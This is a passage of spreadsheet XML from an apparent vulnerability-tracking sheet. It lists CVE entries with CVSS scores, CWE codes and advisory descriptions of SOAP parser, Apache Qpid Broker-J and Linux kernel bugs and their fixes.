      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>cleanup_xml_node() in the SOAP XML parser recurses once per XML nesting level with no depth limit. An unauthenticated attacker can post a SOAP request containing tens of thousands of nested elements to any SoapServer endpoint, exhaust the stack and crash the process. The same unbounded recursion exists in the SOAP value decoder and in the WSDL node search helper.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91765</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92550</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>A pre-authentication attacker could leverage type size/count handling to cause excessive allocation leading to potential denial of service.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92550</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92560</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>A pre-authentication attacker could leverage type size/count handling to cause excessive allocation leading to potential denial of service.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92560</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92608</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>Improper handling of property-encoding exceptions in AMQP 1.0-to-AMQP 0-10 message conversion allows authenticated message producers to disrupt delivery to AMQP 0-10 consumers via message properties that the target encoder does not handle correctly.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92608</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97523</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr"/>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: close race between scheduler and state change
The mptcp scheduler may race with subflow sockets state change: data
transmission on the selected socket may fail and a later release could
try to use mss_now reset to 0 for a divide operation.
Address the issue by explicitly checking for the critical scenario.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97523</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97524</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr"/>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: avoid unneeded actions on subflow reset
Once in a blue moon, the mptcp receive path can recursively call
mptcp_data_ready() via state change under unlucky error conditions, and
then try to hold the data lock again.
Break the recursion loop explicitly checking for the exceptional
condition.
Add a new flag instead of using an existing one like 'closing', to exit
early in subflow_state_change(), and explicitly flush the RX queue at
reset time.
This avoids unneeded processing to check for available data -- calling
get_mapping_status() and more on a dying subflow -- but also in error
reporting and worker scheduling.
Note that we must consume the currently peeked skb before invoking
mptcp_dss_corruption to avoid consuming it again after the eventual
reset has freed it.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97524</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97531</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr"/>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Skip vport under deletion in report ID acquisition
qla24xx_report_id_acquisition() format-1 handling walks ha-&gt;vp_list under
vport_slock, takes a vref_count on the matching vport and calls
qla_update_host_map() to register its port id.
A vport teardown via qla24xx_vport_delete() sets VPORT_DELETE, then
qla24xx_disable_vp() removes the vport from the host_map btree and zeroes
vha-&gt;d_id (RESET_AL_PA). The vport is only unlinked from vp_list later,
in qla24xx_deallocate_vp_id(), which clears vp_map[idx] (RESET_VP_IDX)
but does not touch host_map. In the window in between, report ID
acquisition can still find the vport on vp_list and call
qla_update_host_map(); with d_id already zeroed it takes the
btree_insert32() path and re-inserts the dying vport into host_map.
Nothing cleans that entry afterwards, so once scsi_host_put() frees the
vha a later host_map lookup dereferences freed memory.
Skip a vport that has VPORT_DELETE set before taking the reference, so it
is neither re-registered nor scheduled for DPC re-registration. This
mirrors the existing guard in qla2x00_alert_all_vps().</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97531</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97536</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr"/>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix use-after-free of qpair work on queue teardown
The response queue MSI-X handler qla2xxx_msix_rsp_q() schedules
qla_do_work() via queue_work(ha-&gt;wq, &amp;qpair-&gt;q_work). qla_do_work()
dereferences the qpair (vha, rsp) and takes qpair-&gt;qp_lock.
During teardown, qla2xxx_delete_qpair() deletes the response queue, which
calls free_irq() in qla25xx_free_rsp_que(), and then frees the queue and
the qpair. free_irq() waits for running hardirq handlers but does not
cancel work already placed on ha-&gt;wq. A still-pending q_work then runs
qla_do_work() against the freed qpair and response queue, causing a
use-after-free. This is especially likely during full adapter teardown,
where destroy_workqueue(ha-&gt;wq) forces pending work to run after the queue
pairs have been freed.
Flush the work item with cancel_work_sync() in qla25xx_free_rsp_que()
after free_irq() has released the interrupt (so no new work can be
queued) and before the response queue and qpair memory are freed (so the
flushed handler still sees valid memory). Guard on rsp-&gt;qpair and ha-&gt;wq
to match the INIT_WORK() condition and avoid operating on an
uninitialized work_struct.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97536</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97557</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr"/>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: avoid leaking refcount in cifs_queue_oplock_break()
cifs_queue_oplock_break() unconditionally takes a reference on the
target file before queueing cifs_oplock_break(). Only that work item
decreases the reference counter again.
If another oplock break arrives while that work is still queued,
queue_work() will return false and not queue this second work item. As a
result, we will never reach the point to drop the file reference again
and are leaking this reference. This can be triggered when interacting
with a slow-responding server.
As a result, later unmount operations for this file system will fail with
  BUG: Dentry ... still in use (1) [unmount of cifs cifs]
  VFS: Busy inodes after unmount of cifs (cifs)
  kernel BUG at fs/super.c:777!
Fix this by only incrementing the reference count if the work has been
queued successfully. Taking it after queue_work() is safe because all
three callers hold tcon-&gt;open_file_lock across the call and
_cifsFileInfo_put() decrements under that same lock, so a worker that
starts the handler in the window cannot drop the reference before it has
been taken.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97557</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97562</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr"/>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: pin DFS superblock in iterator callback
tcon_super_cb() stores a raw superblock pointer, but __cifs_get_super()
takes its active reference only after iterate_supers_type() has dropped
s_umount and its passive reference. Concurrent DFS automount expiry can
therefore free the superblock before cifs_sb_active() uses it.
A deterministic KASAN test reproduces the race as:
  BUG: KASAN: slab-use-after-free in cifs_sb_active+0x77/0x80
The same test passes with this change applied.
Take the active reference in the callback while iterate_supers_type()
still holds s_umount shared. cifs_put_tcp_super() remains the matching
release.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97562</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97583</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr"/>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
afs: Clear stale peer app data after address list changes
afs_fs_probe_fileserver() fetches the current endpoint state under
server-&gt;fs_lock, but leaves old_alist as NULL.  Consequently,
afs_set_peer_appdata() treats every address list replacement as initial
setup and only binds the new peers; it never unbinds peers removed from
the old list.
An address refresh can therefore proceed as follows.  CPU 0 replaces
server S's list and drops Pold without clearing Pold-&gt;app_data.  The
server destroyer then clears only S's current peers and lets S reach its
RCU callback.  After the callback frees S, CPU 1 handles a callback
through an RxRPC connection that still pins Pold, reads Pold-&gt;app_data,
and calls afs_use_server() on the freed object.
KASAN reported:
  BUG: KASAN: slab-use-after-free in afs_find_server+0x3c/0xa0
  Read of size 4 at addr ffff8881013e1af0 by task krxrpcio/7001/74
  Call Trace:
   afs_find_server+0x3c/0xa0
   afs_rx_new_call+0x15c/0x390
   rxrpc_new_incoming_call+0x97c/0x1730
   rxrpc_input_packet.constprop.0+0xd03/0xec0
   rxrpc_io_thread+0x967/0x1640
  Allocated by task 93:
   afs_lookup_server+0x1a7/0x14c0
   afs_alloc_server_list+0x43f/0xb60
   afs_create_volume+0x923/0x1490
   afs_get_tree+0x1c6/0x10a0
  Freed by task 0:
   kfree+0x131/0x3c0
   rcu_core+0x50a/0x1850
  Last potentially related work creation:
   __call_rcu_common.constprop.0+0x71/0xa10
   afs_put_server+0x213/0x2b0
Preserve old-&gt;addresses for the peer app-data update so that removed
peers are cleared before the endpoint state is replaced.  Also advance
both cursors when the old and new lists share a peer; activating the
old/new comparison without this would otherwise loop forever on the
shared entry.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97583</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97595</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr"/>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mac802154: fix use-after-free of sdata via queued RX frames
The RX softirq producer ieee802154_subif_frame() queues received beacon
and MAC-command frames onto local-&gt;rx_beacon_list / rx_mac_cmd_list and
schedules a process-context worker, storing a raw mac_pkt-&gt;sdata (and
skb-&gt;dev == sdata-&gt;dev) with neither a reference nor any locking:
 - the lists have no lock: the softirq producer list_add_tail()s while the
   mac_wq worker list_del()s, so sibling interfaces on the same phy corrupt
   the list;
 - the workers dereference the interface after it may have been freed.
   mac802154_rx_mac_cmd_worker() touches mac_pkt-&gt;sdata directly, and
   mac802154_rx_beacon_worker() -&gt; mac802154_process_beacon() dereferences
   skb-&gt;dev (== sdata-&gt;dev). Removing an interface frees its sdata
   (netdev_priv) while a queued frame still points at it, so a later worker
   run is a use-after-free.
Reproduced under KASAN by flooding a victim interface with MAC command
frames and removing it (the beacon path is the same class via skb-&gt;dev):
  BUG: KASAN: slab-use-after-free in mac802154_rx_mac_cmd_worker+0x463/0x630 [mac802154]
  Read of size 4 at addr ffff888002f9ea18 by task kworker/u8:1/31
  Workqueue: phy0-mac-cmds mac802154_rx_mac_cmd_worker [mac802154]
  Call Trace:
   mac802154_rx_mac_cmd_worker+0x463/0x630 [mac802154]
   process_one_work+0x611/0xe80
   worker_thread+0x52e/0xdc0
   kthread+0x30c/0x630
   ret_from_fork+0x2fd/0x3e0
Fix both lists together:
 - add local-&gt;rx_lock and take it around every list access: the softirq
   producer (plain spin_lock, softirq context) and the workers and flush
   (spin_lock_bh, process context);
 - pin the interface for the lifetime of a queued frame with
   netdev_hold()/netdev_put(), so the worker can safely dereference sdata /
   skb-&gt;dev even while the interface is being removed;
 - dequeue under the lock at the head and loop-drain the whole list in the
   workers (they previously processed one frame per run and relied on a
   later enqueue to drain the rest);
 - drop not-yet-started frames of an interface before it is unregistered,
   from ieee802154_if_remove() (after the RCU grace period) and from the
   ieee802154_remove_interfaces() loop -- the latter is the whole-phy
   teardown path, which does not go through ieee802154_if_remove().
An in-flight worker that already dequeued a frame keeps its own netdev
reference; unregister_netdevice() then waits it out in netdev_run_todo(),
which runs at rtnl_unlock() (rtnl released) and after the interface has
been closed, so it does not pin rtnl. A worker blocked in an association
TX only delays that one interface's unregister (the usual "waiting for %s
to become free"), it does not hold rtnl. netdev_hold() is used for this
reason instead of a cancel_work_sync() under rtnl, which would block on
the worker's unbounded MLME TX wait via ieee802154_sync_queue().
The mac-command worker additionally skips processing for a stopped
interface (ieee802154_sdata_running()), avoiding a needless association
response during teardown.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97595</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97990</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr"/>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vdpa_sim_net: check TX pull result before RX copy
vringh_iov_pull_iotlb() returns a signed byte count.  A failed TX pull is
currently added to the unsigned byte counter and then passed as a size_t
length to receive_filter() and vringh_iov_push_iotlb().  A negative error
can therefore become a large length in the RX path.
Handle non-positive pull results before every length use.  Count the TX
error and complete the consumed TX descriptor with zero bytes.
I found this bug myself, though the patch was written with AI assistance.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97990</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98050</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
